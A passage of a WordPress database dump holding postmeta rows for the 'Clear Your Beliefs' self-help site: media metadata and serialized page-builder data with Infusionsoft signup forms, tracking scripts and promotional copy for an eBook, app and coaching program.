(1237, 1708, '_wp_attachment_metadata', 'a:12:{s:8:"lossless";b:0;s:7:"bitrate";i:1003;s:8:"filesize";i:48210754;s:9:"mime_type";s:11:"video/x-flv";s:6:"length";i:371;s:16:"length_formatted";s:4:"6:11";s:5:"width";i:640;s:6:"height";i:480;s:10:"fileformat";s:3:"flv";s:10:"dataformat";s:3:"flv";s:5:"codec";s:14:"Sorenson H.263";s:5:"audio";a:7:{s:10:"dataformat";s:3:"flv";s:5:"codec";s:3:"mp3";s:11:"sample_rate";i:44100;s:15:"bits_per_sample";i:16;s:8:"channels";i:2;s:8:"lossless";b:0;s:11:"channelmode";s:6:"stereo";}}'),
(1238, 1340, 'panels_data', 'a:0:{}'),
(1239, 1288, 'panels_data', 'a:0:{}'),
(1240, 1395, '_edit_lock', '1415830505:2'),
(1241, 1714, '_wp_attached_file', '2014/07/1-Clear-Your-Beliefs-01-10-min-clip1.mp3'),
(1242, 1714, '_wp_attachment_metadata', 'a:15:{s:10:"dataformat";s:3:"mp3";s:8:"channels";i:1;s:11:"sample_rate";i:44100;s:7:"bitrate";i:256000;s:11:"channelmode";s:4:"mono";s:12:"bitrate_mode";s:3:"cbr";s:8:"lossless";b:0;s:15:"encoder_options";s:6:"CBR256";s:17:"compression_ratio";d:0.36281179138321995;s:10:"fileformat";s:3:"mp3";s:8:"filesize";i:24113428;s:9:"mime_type";s:10:"audio/mpeg";s:6:"length";i:754;s:16:"length_formatted";s:5:"12:33";s:4:"year";s:25:"2014-08-16T15:08:02-07:00";}'),
(1243, 1717, '_wp_attached_file', '2014/07/1-Clear-Your-Beliefs-01-10-min-clip2.mp3'),
(1244, 1717, '_wp_attachment_metadata', 'a:15:{s:10:"dataformat";s:3:"mp3";s:8:"channels";i:1;s:11:"sample_rate";i:44100;s:7:"bitrate";i:256000;s:11:"channelmode";s:4:"mono";s:12:"bitrate_mode";s:3:"cbr";s:8:"lossless";b:0;s:15:"encoder_options";s:6:"CBR256";s:17:"compression_ratio";d:0.36281179138321995;s:10:"fileformat";s:3:"mp3";s:8:"filesize";i:24113428;s:9:"mime_type";s:10:"audio/mpeg";s:6:"length";i:754;s:16:"length_formatted";s:5:"12:33";s:4:"year";s:25:"2014-08-16T15:08:02-07:00";}'),
(1245, 1720, '_edit_lock', '1432925607:2'),
(1246, 1720, '_edit_last', '2'),
(1247, 1720, '_wp_page_template', 'default'),
(1248, 1720, 'panels_data', 'a:0:{}'),
(1367, 1813, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1396:"[su_box title="Free eBook" class=''three-container'' box_color="#1a2d8c" radius="8"]\n<center>\n	<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p">\n	<strong>Download the free eBook.</strong>\n</p>\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid">\n	<input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" />\n	<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n	<div class="infusion-field">\n		<label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n		<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" />\n	</div>\n<div class="infusion-field">\n	<label class="form-label" for="inf_field_Email">EMAIL *</label>\n	<input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" />\n</div>\n<div class="form-input-container-button">\n	<input class="form-input-button" type="submit" value="GET ACCESS NOW" />\n</div>\n</form>\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1839:"[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]\n<center>\n	<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1">\n	<strong>DOWNLOAD the FREE APP</strong>\n</p>\n<p class="tri-panel-p tri-panel-2nd-p-2">\n	Start Clearing Whatever Is In The Way Right Now!\n</p>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST">\n	<input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" />\n	<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n	<div class="form-input-container-button">\n		<input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" />\n	</div>\n</form>\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST">\n	<input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" />\n	<input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" />\n	<input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n<div class="form-input-container-button">\n	<input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" />\n</div> \n</form>\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1280:"[/su_box]\n-------------------------------------------------------------------------------------------------------------------\n[su_box title="Complete Program" class=''three-container box_color="#1a2d8c" radius="8"]\n	<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;">\n	<big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big>\n</p>\n<form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST">\n	<input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" />\n	<input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n	<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button">\n	<input class="form-input-button" type="submit" value="LEARN MORE" />\n</div>\n</form>\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1365, 1812, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:1505:"<p>[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -30px; margin-top: 15px;"><br /> <img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><p><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><br /> <input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><br /> <input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2157:"<p>[su_box title="Free App" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><form class="infusion-form nd-form-1" style="position: relative; top: 10px ! important;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><p><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></p><form class="infusion-form nd-form-1" style="position: relative; bottom: -2px ! important;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> <br /><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div><p> </p></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1208:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p><br><br><br><br>\n\n<form class="infusion-form rd-form-1" style="position: relative; " accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1251, 1726, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:560px; height:315px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:579:"<p>[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]</p><center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p><div style="margin-left: 0px; margin-bottom: 0px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div><p>[/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:872:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -9px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -25px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -48px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:658:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -25px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	